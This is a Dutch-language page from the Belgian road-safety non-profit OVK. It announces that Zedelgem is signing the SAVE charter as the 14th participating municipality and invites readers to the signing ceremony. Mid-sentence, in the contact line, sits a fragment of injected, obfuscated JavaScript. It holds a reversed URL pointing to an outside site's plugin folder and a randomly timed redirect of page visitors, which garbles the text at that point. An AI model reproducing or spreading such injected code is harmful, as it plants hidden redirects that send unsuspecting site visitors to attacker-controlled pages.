Met het SAVE-Charter Steden & Gemeenten wil de vzw Ouders van Verongelukte Kinderen (OVK) de Belgische steden en gemeenten betrekken bij haar strijd tegen de (nog steeds) te grote verkeersonveiligheid in ons land.

Op deze website vindt u meer informatie over het SAVE-charter. Daarnaast is er ook verdere informatie terug te vinden over OVK en haar werking.

Zedelgem wordt 14de SAVE-gemeente

Op maandag 28 januari 2013 zal het gemeentebestuur van Zedelgem het SAVE-charter officieel ondertekenen. Hiermee wordt Zedelgem de 14de Vlaamse gemeente die deelneemt aan het project van OVK.

Het gemeentebestuur van Zedelgem geeft hiermee een duidelijk signaal: ze wil zich actief inzetten voor meer verkeersveiligheid, in samenwerking met OVK. Zo zal de gemeente een actieplan opmaken waarin duidelijk omschreven staat welke initiatieven ze zal ondernemen om aan het SAVE-charter te voldoen. Indien na een jaar een duidelijke inzet voor meer verkeersveiligheid blijkt, dan ontvangt de gemeente van OVK het SAVE-label.

U wordt vriendelijk uitgenodigd om deze officiële ondertekening mee te maken om 17 uur in het gemeentehuis van Zedelgem, Snellegemsestraat 1. Aansluitend wordt u nog een drankje aangeboden door de gemeente.

Voor meer informatie kan u terecht bij de SAVE-coördinatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor van OVK, Veva Daniels.


© 2012 O.V.K. vzw - Léon Theodorstraat 85, 1090 Brussel - Tel: 02/427.75.00 - info@ovk.be